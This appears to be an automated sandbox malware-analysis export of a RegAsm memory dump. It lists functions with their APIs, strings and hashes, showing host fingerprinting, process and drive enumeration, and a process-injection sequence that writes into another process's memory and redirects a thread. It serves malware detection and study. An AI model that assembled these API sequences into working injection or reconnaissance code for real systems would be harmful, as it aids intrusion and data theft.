Opcode Fuzzy Hash: baa2dc263a1b6845e1dbba7907f855f2c15fc2d89a61f68a7661ccb89eda7454
Instruction Fuzzy Hash: B75118B1900A28AFDF21DF64DC84BEFBBB9EB08346F0050E6E509A2290D6755F858F55

Function 00411684 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
_memset.LIBCMT ref: 004116CE

Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB

Strings

Unknown, xrefs: 0041173C

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CurrentProfile_memsetmallocstrncpy
String ID: Unknown
API String ID: 455225556-1654365787
Opcode ID: ab585756b44732b0c52de9de7319f605c52bcc59fa939e737159a870399f43be
Instruction ID: 5196d0f985b73c0c8bd0bad26c43f83b5151f3b6dc85e60399ef39d4da867d2e
Opcode Fuzzy Hash: ab585756b44732b0c52de9de7319f605c52bcc59fa939e737159a870399f43be
Instruction Fuzzy Hash: 6F118671A0011CABCB21EB65DD86FDD73B8AB18704F4004A6B645F7191DAB8AFC88F58

Function 00410B30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B79
RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B95

Strings

Windows 11, xrefs: 00410B5C

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: OpenQueryValue
String ID: Windows 11
API String ID: 4153817207-2517555085
Opcode ID: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
Instruction ID: c636f12a4b9fd3341eb7223670fa9a8d4496e2c02347a6f2be12f88bf3247473
Opcode Fuzzy Hash: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
Instruction Fuzzy Hash: 1AF06875600304FBFF149BD1DC4AFAB7A7EEB4470AF1410A5F601D5190E7B6AA909714

Function 00410BA9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BE2
RegQueryValueExA.KERNEL32(00436888,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ), ref: 00410BFD

Strings

CurrentBuildNumber, xrefs: 00410BF5

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: OpenQueryValue
String ID: CurrentBuildNumber
API String ID: 4153817207-1022791448
Opcode ID: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
Instruction ID: adfa9e2f60a12e4d5f9b95a3627e322926d469c0f3b43989f67d349f50e983ff
Opcode Fuzzy Hash: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
Instruction Fuzzy Hash: E9F09075640304BBEF159B90DC0AFAF7A7EEB44B06F240055F601A50A0E6B25A909B50

Function 0041257F Relevance: 4.5, APIs: 3, Instructions: 37processCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00412589
CreateToolhelp32Snapshot.KERNEL32(?,00000000,0000013C,00417E31,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
Process32First.KERNEL32(00000000,00000128), ref: 004125B8

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateFirstH_prolog3_catch_Process32SnapshotToolhelp32
String ID:
API String ID: 1863932500-0
Opcode ID: c9d347d910f7b4a70f950499f2b0cdb52079f09d3bb31312a8c8ade1b0a83c2a
Instruction ID: d2a27fa508e6c3a354df25509a6f4190b9582d57abc1eee0c1e907853c614cd1
Opcode Fuzzy Hash: c9d347d910f7b4a70f950499f2b0cdb52079f09d3bb31312a8c8ade1b0a83c2a
Instruction Fuzzy Hash: 3B0162316002249BDB619B60DD44FEA76FD9B14301F8400E6E40DD2251EA798F949B25

Function 00410C85 Relevance: 4.5, APIs: 3, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
RtlAllocateHeap.NTDLL(00000000,?,?,?,00401385), ref: 00410C98
GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocateComputerNameProcess
String ID:
API String ID: 1664310425-0
Opcode ID: 223c93d772ac102104f3d80f3225d4df8625dfe3dc4c13cc38eb63403da552c2
Instruction ID: 4a48e0897f6a5e53a67cc5d7e0c14adbc6ce47083a4b6c26751418be0e4428b5
Opcode Fuzzy Hash: 223c93d772ac102104f3d80f3225d4df8625dfe3dc4c13cc38eb63403da552c2
Instruction Fuzzy Hash: 2DE08CB1200204BBD7449BD9AC8DF8A76BCDB84715F100226F605D6250EAB4C9848B68

Function 00416DC6 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00416DCD

Strings

ERROR, xrefs: 00416E54

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog3_catch
String ID: ERROR
API String ID: 3886170330-2861137601
Opcode ID: f5cac69a8e03ad0b6c4e6e4e85c674d5d8d8f9bcd14ecaaf805fabf9f15bbc4a
Instruction ID: af559da7a52deda925aca90371b7d636d26c87dd73bd3b1907a7f448f6be4e16
Opcode Fuzzy Hash: f5cac69a8e03ad0b6c4e6e4e85c674d5d8d8f9bcd14ecaaf805fabf9f15bbc4a
Instruction Fuzzy Hash: 6F119371900509AFCB40FF75D9025DDBBB1BF04308B90513AE414E3591E739EAA98FC9

Function 00411119 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154

Strings

%d MB, xrefs: 00411174

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: GlobalMemoryStatus
String ID: %d MB
API String ID: 1890195054-2651807785
Opcode ID: 8862206487a5735529afe943f838936f5b8579a15e145366872ddc586f9bf33b
Instruction ID: b0b061f5290e25b68b6f7a4002290a0ac05d972f49bd8262d04e688218eddb93
Opcode Fuzzy Hash: 8862206487a5735529afe943f838936f5b8579a15e145366872ddc586f9bf33b
Instruction Fuzzy Hash: 7801A9B1E00218ABEB08DFB4DC45EEEB7B9EF08705F44006AF602D7290EA75D9818759

Function 0041224A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287

Strings

=A, xrefs: 0041225D, 00412262

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileModuleName
String ID: =A
API String ID: 514040917-2399317284
Opcode ID: a5843cda12b70cc7bcbf256d8a6036821e346dccf5e361165451a22e509f8efe
Instruction ID: 00f88837b3f4b8dbd17d966d98a560f1caae43d713f472eddac2d47ecb876e1e
Opcode Fuzzy Hash: a5843cda12b70cc7bcbf256d8a6036821e346dccf5e361165451a22e509f8efe
Instruction Fuzzy Hash: D8F0B471600218ABDB24EB68DC45FEE7BBC9B48B08F00006AF645D7180EEB5DAC5CB55

Function 00416E97 Relevance: 3.1, APIs: 2, Instructions: 70synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateObjectSingleThreadWait
String ID:
API String ID: 1891408510-0
Opcode ID: a1dc13e99dd204c5a3461b4ea6d28ee21b2c0be54f1f4843eeff7d6218642cdc
Instruction ID: 5b264aedade7dddb2649676fe5ff4aca135c6ea40ecc08e40dc523016e9b5da3
Opcode Fuzzy Hash: a1dc13e99dd204c5a3461b4ea6d28ee21b2c0be54f1f4843eeff7d6218642cdc
Instruction Fuzzy Hash: EC213B72900218ABCF14EF96E9459DE7BB9FF40358F11512BF904A3151D738EA86CF98

Function 00410F51 Relevance: 3.0, APIs: 2, Instructions: 35registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: OpenQueryValue
String ID:
API String ID: 4153817207-0
Opcode ID: 516f2c0c8b5e6a914cb95f881748b3b593324cf3efc2baeb97f22068c18ac649
Instruction ID: 198c8e352812e869def4411d780e2caea40c147a773264a459f6a712475eeb20
Opcode Fuzzy Hash: 516f2c0c8b5e6a914cb95f881748b3b593324cf3efc2baeb97f22068c18ac649
Instruction Fuzzy Hash: C9F03075640304FBEF148B90DC0AFAE7B7EEB44706F141094F601A51A0E7B29B509B60

Function 00411E1F Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37

Strings

1iA, xrefs: 00411E47

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID: 1iA
API String ID: 3494564517-1863120733
Opcode ID: ab387d88e84e58f7ee09dd024291177f022f73d374550d18fdbda7562f7ae9e7
Instruction ID: dc66f3ebc75c526b8f29ca666c763a1a9938aadc44e5483d7dab6bcf02b3e8fe
Opcode Fuzzy Hash: ab387d88e84e58f7ee09dd024291177f022f73d374550d18fdbda7562f7ae9e7
Instruction Fuzzy Hash: 08E02B3AA41B201FC7724BAA8804AB7BB5A9FC2F61B18412BDF49CB324D535CC4182E4

Function 0041CBB8 Relevance: 2.5, APIs: 2, Instructions: 39COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 0041CBC9

Part of subcall function 0041BB6C: lstrlenA.KERNEL32(?,0041CBDA,0041CC7C,00000000,06400000,00000003,00000000,0041757F,.exe,00436C5C,00436C58,00436C54,00436C50,00436C4C,00436C48,00436C44), ref: 0041BB9E
Part of subcall function 0041BB6C: malloc.MSVCRT ref: 0041BBA6
Part of subcall function 0041BB6C: lstrcpyA.KERNEL32(00000000,?), ref: 0041BBB1

malloc.MSVCRT ref: 0041CC06

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: malloc$lstrcpylstrlen
String ID:
API String ID: 2974738957-0
Opcode ID: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
Instruction ID: ee4a01d13f6e4d683757beabffaaf009a5c9ff74aa08d02828624340765fdc95
Opcode Fuzzy Hash: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
Instruction Fuzzy Hash: FBF0F0766482119BC7206F66EC8199BBB94EB447A0F054027EE08DB341EA38DC8083E8

Function 00418643 Relevance: 1.7, APIs: 1, Instructions: 154libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,004184C2), ref: 0041887D

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4153ecd493db34a1094e14b788043fe07f5e2afe7ddd22b5ff6fe96697fb63f9
Instruction ID: 2c76b628124a1797fdce28c748a09696ce6250a2eaa67b4899ff399dadce2328
Opcode Fuzzy Hash: 4153ecd493db34a1094e14b788043fe07f5e2afe7ddd22b5ff6fe96697fb63f9
Instruction Fuzzy Hash: 96711675910312AFEF1ADF60FD088243BA7F70874BF10A426E91582270EB374A64EF55

Function 00410CC0 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000), ref: 00410CDF

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c7062ee0803dc682f4bd22a1f6830d1074b171fc43ac1dbb61c851727eb39e82
Instruction ID: 3361d4878da1eea6239f97e2bf75980f5f1ac49a34b78f17876420eca4585326
Opcode Fuzzy Hash: c7062ee0803dc682f4bd22a1f6830d1074b171fc43ac1dbb61c851727eb39e82
Instruction Fuzzy Hash: 4DF031B1900218BBDF14DFE59C059BF77BDAB0C616F001095F941E2180E6399A80D775

Non-executed Functions

Function 0041C472 Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 440COMMON

Download Yara Rule

Strings

UT, xrefs: 0041C79D
/, xrefs: 0041C525

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: /$UT
API String ID: 0-1626504983
Opcode ID: 94b155d6eae385495534a97f883fd4c918c0e8828a42b8e7b6cfe56aff5eeafa
Instruction ID: 63eef66cd8fe0e336db70064ed11a5ad7b696d25642cb4984019eb1642be8bef
Opcode Fuzzy Hash: 94b155d6eae385495534a97f883fd4c918c0e8828a42b8e7b6cfe56aff5eeafa
Instruction Fuzzy Hash: 8E027DB19442698BDF21DF64CC807EEBBB5AF45304F0440EAD948AB242D7389EC5CF99

Function 0040F54A Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 130injectionthreadmemoryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040F57C
GetThreadContext.KERNEL32(?,00000000), ref: 0040F5C4
ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0040F5E2
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 0040F5F8
WriteProcessMemory.KERNEL32(?,00000000,a-A,?,00000000), ref: 0040F627
WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0040F65D
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0040F684
SetThreadContext.KERNEL32(?,00000000), ref: 0040F696

Strings

C:\Windows\System32\cmd.exe, xrefs: 0040F59B
a-A, xrefs: 0040F550, 0040F620

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: MemoryProcess$Write$ContextThread$AllocReadVirtual_memset
String ID: C:\Windows\System32\cmd.exe$a-A
API String ID: 1852632844-431432405
Opcode ID: e1ccbe8c928e2f1c21e5e7053cc7bb29076fa0b0443f7d3298dfd20d4594a4fa
Instruction ID: 0d24e25234c3a3ad141f65fc29eb95852bfeeab9a63bd67a8dcfe51b88e854c0
Opcode Fuzzy Hash: e1ccbe8c928e2f1c21e5e7053cc7bb29076fa0b0443f7d3298dfd20d4594a4fa
Instruction Fuzzy Hash: B5413872A00208AFEB11DFA4DC85FAAB7B9FF48705F144475FA01E6161E776AD448B24

Function 00415142 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004151C2
_memset.LIBCMT ref: 004151E5
GetDriveTypeA.KERNEL32(?), ref: 004151EE

Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D4F
Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D60
Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414E28

Strings

*%DRIVE_REMOVABLE%*, xrefs: 0041518F
%DRIVE_FIXED%, xrefs: 00415230
%DRIVE_REMOVABLE%, xrefs: 00415215
*%DRIVE_FIXED%*, xrefs: 0041515E

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memset$Drive$LogicalStringsType
String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
API String ID: 2132072831-147700698
Opcode ID: 7bbfb83d683dda401e0b4031a2b5908d2ccda3928876b9befa689fcfaf94df2d
Instruction ID: 002cc7b8fd832fc02ac953dee8a9373947a5751985c47ec76440b2e4c0201c02
Opcode Fuzzy Hash: 7bbfb83d683dda401e0b4031a2b5908d2ccda3928876b9befa689fcfaf94df2d
Instruction Fuzzy Hash: 1B512DB190021CAFDF219FA1CC85BDA7BB9FB09304F1041AAEA48A7111E7355E89CF59

Function 0040180D Relevance: 12.1, APIs: 8, Instructions: 68sleepthreadCOMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32(00000000,00000001,80000000), ref: 00401823
SetThreadDesktop.USER32(00000000), ref: 0040182A
GetCursorPos.USER32(?), ref: 0040183A
Sleep.KERNEL32(000003E8), ref: 0040184A
GetCursorPos.USER32(?), ref: 00401859
Sleep.KERNEL32(00002710), ref: 0040186B
Sleep.KERNEL32(000003E8), ref: 00401870
GetCursorPos.USER32(?), ref: 0040187F

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CursorSleep$Desktop$InputOpenThread
String ID:
API String ID: 3283940658-0
Opcode ID: f5ba76f92f65e2804661e56e76115090119226def0e33c1286c40128a66e7fa7
Instruction ID: 6ce610161f310883e20b46de56f80fe1d7998de54b5bc585690095a2dc5f2f67
Opcode Fuzzy Hash: f5ba76f92f65e2804661e56e76115090119226def0e33c1286c40128a66e7fa7
Instruction Fuzzy Hash: C9112E32E00209EBEB10EBA4CD89AAF77B9AF44301F644877D501B21A0D7789B41CB58

Function 0042B0CC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,?,?,?,0042B735,?,004284E6,?,000000BC,?), ref: 0042B10B
GetLocaleInfoW.KERNEL32(?,20001004,?,?,?,?,0042B735,?,004284E6,?,000000BC,?), ref: 0042B134
GetACP.KERNEL32(?,?,0042B735,?,004284E6,?,000000BC,?), ref: 0042B148

Strings

ACP, xrefs: 0042B0DB
OCP, xrefs: 0042B0EC

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 6f20a6a568b6e14900c222ba86026eddd2a2274cf4f13b45eb98a022f40272da
Instruction ID: 9a82d2d165bf88aca29a0bf8e749ef3f3ea21aabb57aac8d650cc6d961d67086
Opcode Fuzzy Hash: 6f20a6a568b6e14900c222ba86026eddd2a2274cf4f13b45eb98a022f40272da
Instruction Fuzzy Hash: 8901B531701626BAEB219B60BC16F6B77A8DB043A8F60002AE101E11C1EB68CE91929C

Function 0041D016 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0041D44E
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041D463
UnhandledExceptionFilter.KERNEL32(0043332C), ref: 0041D46E
GetCurrentProcess.KERNEL32(C0000409), ref: 0041D48A
TerminateProcess.KERNEL32(00000000), ref: 0041D491

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: f0bae7c02ec03e9cd254ee3e77ce7dcb23bfee01a8b87353ff1e7fdac0599424
Instruction ID: db72b0d0349af5086fa5416fb06d4d65b4d62ee2eec0edc44458765686740910
Opcode Fuzzy Hash: f0bae7c02ec03e9cd254ee3e77ce7dcb23bfee01a8b87353ff1e7fdac0599424
Instruction Fuzzy Hash: 1921ABB4C01705DFD764DFA9F988A447BB4BF08316F10927AE41887262EBB4D9818F5E

Function 0041C0E9 Relevance: 3.1, APIs: 2, Instructions: 63timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,74DE83C0,00000000,?,?,?,?,?,?,?,?,0041C5A4,?), ref: 0041C13E
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,0041C5A4,?), ref: 0041C14C

Part of subcall function 0041B92A: FileTimeToSystemTime.KERNEL32(?,?,?,?,0041C211,?,?,?,?,?,?,?,?,?,?,0041C5B4), ref: 0041B942

Part of subcall function 0041B906: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041B923

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 568878067-0
Opcode ID: e18be1e8a3847ab2d69564342152f85ca1bd5b155455464045d2105bdf40e3da
Instruction ID: e9dd666d6f03e3bc2370fb34bb5a4ee32d8a7198e314cb59bed8413d438bc6b2
Opcode Fuzzy Hash: e18be1e8a3847ab2d69564342152f85ca1bd5b155455464045d2105bdf40e3da
Instruction Fuzzy Hash: D421E6B19002099FCF44DF69D9806ED7BF5FF08300F1041BAE949EA21AE7398945DFA4

Function 0042B556 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

EnumSystemLocalesA.KERNEL32(Function_0002B1C1,00000001), ref: 0042B56F

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 50f329e47e560d397284a7460fab74257ebf44bd3fd5d611c322744838e49ff6
Instruction ID: a965a9a856964b19ccfd622dabb5ac07b34b26fd65f40016140b6e3a2338ef0b
Opcode Fuzzy Hash: 50f329e47e560d397284a7460fab74257ebf44bd3fd5d611c322744838e49ff6
Instruction Fuzzy Hash: 20D05E71B50700ABD7204F30AD497B177A0EB20B16F70994ADC92490C0D7B865D58649

Function 0042762E Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000275EC), ref: 00427633

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: aa3703d3437d06fb50dade6e7388276a3799fb2df3744491841b8284a36df350
Instruction ID: 9d6a1cee47f635cf13ac9ce2c832d8e993c26a4a09d493c42fccfa592e4f4ed0
Opcode Fuzzy Hash: aa3703d3437d06fb50dade6e7388276a3799fb2df3744491841b8284a36df350
Instruction Fuzzy Hash: 109002A035E250578A0217716C1D50565946A48706B951561A001C4454DBA580409919

Function 0040111D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f96b6833605b0715f9484dbe982297a654c379e9a96f2571680b3f7b5e8fa17
Instruction ID: 43cdf4ecb647160fda175e5076d83385583e07dd488e496ff266cef725db0fb4
Opcode Fuzzy Hash: 9f96b6833605b0715f9484dbe982297a654c379e9a96f2571680b3f7b5e8fa17
Instruction Fuzzy Hash: 7ED092B1509719AFDB288F5AE480896FBE8EE48274750C42EE8AE97700C231A8408B90

Function 0041859A Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
Instruction ID: d256f1c99479b207678580fcb63197705f640815169115519c5f26934de16b0c
Opcode Fuzzy Hash: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
Instruction Fuzzy Hash: 1AE06C78A61648EFC740CF48C185E49B3F8FB09768F118095E905DB321C378EE00EB50

Function 0040148A Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
Instruction ID: 6edc1f77bc014f77afb1dd4525fcd7db61d9a3eb149a076bd6fc7a55924a73f3
Opcode Fuzzy Hash: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
Instruction Fuzzy Hash: D9C08C72529208EFD70DCB84D613F5AB3FCE704758F10409CE00293780C67DAB00CA58

Function 004014A2 Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

